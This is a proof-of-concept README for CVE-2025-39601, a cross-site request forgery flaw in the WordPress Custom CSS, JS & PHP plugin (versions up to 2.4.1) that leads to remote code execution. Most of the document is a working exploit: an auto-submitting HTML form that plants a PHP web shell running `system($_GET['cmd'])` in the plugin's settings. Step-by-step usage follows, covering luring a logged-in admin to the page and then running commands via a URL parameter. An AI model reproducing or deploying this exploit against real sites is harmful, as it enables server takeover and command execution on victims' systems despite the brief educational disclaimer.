
# 🚨 CVE-2025-39601 - CSRF to RCE in WordPress Custom CSS, JS & PHP plugin <= 2.4.1

## 🧠 Description

A **Cross-Site Request Forgery (CSRF)** vulnerability in the **WPFactory Custom CSS, JS & PHP** plugin allows for **Remote Code Execution (RCE)** by injecting malicious PHP code via unauthorized POST requests.  
This affects all versions **up to and including 2.4.1**.

- **CVE ID:** CVE-2025-39601  
- **Published:** 2025-04-16  
- **Updated:** 2025-04-16  
- **Severity:** 🔥 9.6 (CRITICAL)  
- **CWE:** CWE-352 - Cross-Site Request Forgery  
- **CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`

---

## 🖼️ Visual Proof

Below is a screenshot showing the result of a successful exploitation, demonstrating how remote code can be executed via the URL parameter:

![Nxploited](https://github.com/Nxploited/CVE-2025-39601/blob/main/img.png)

---
![Nxploited](https://github.com/Nxploited/CVE-2025-39601/blob/main/IMG2.png)

---

## 💥 Proof of Concept (PoC)

```html
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>
```

---

## 🧪 Usage

1. Host the above HTML file on any external server or local environment.
2. While an **admin user is logged in**, visit the hosted HTML file in their browser.
3. This will silently submit the form and inject PHP code into the plugin’s settings.
4. The code is then executed automatically on every page load via the `plugins_loaded` hook.
5. Example execution:
   ```
   http://target-site.com/?cmd=whoami
   ```

---

## ⚠️ Disclaimer

This PoC is for **educational purposes only**.  
The author is **not responsible for any misuse or damage** caused by improper application of this information.  
Always test in controlled environments and with permission.

---

*By: Nxploited | Khaled Alenazi*
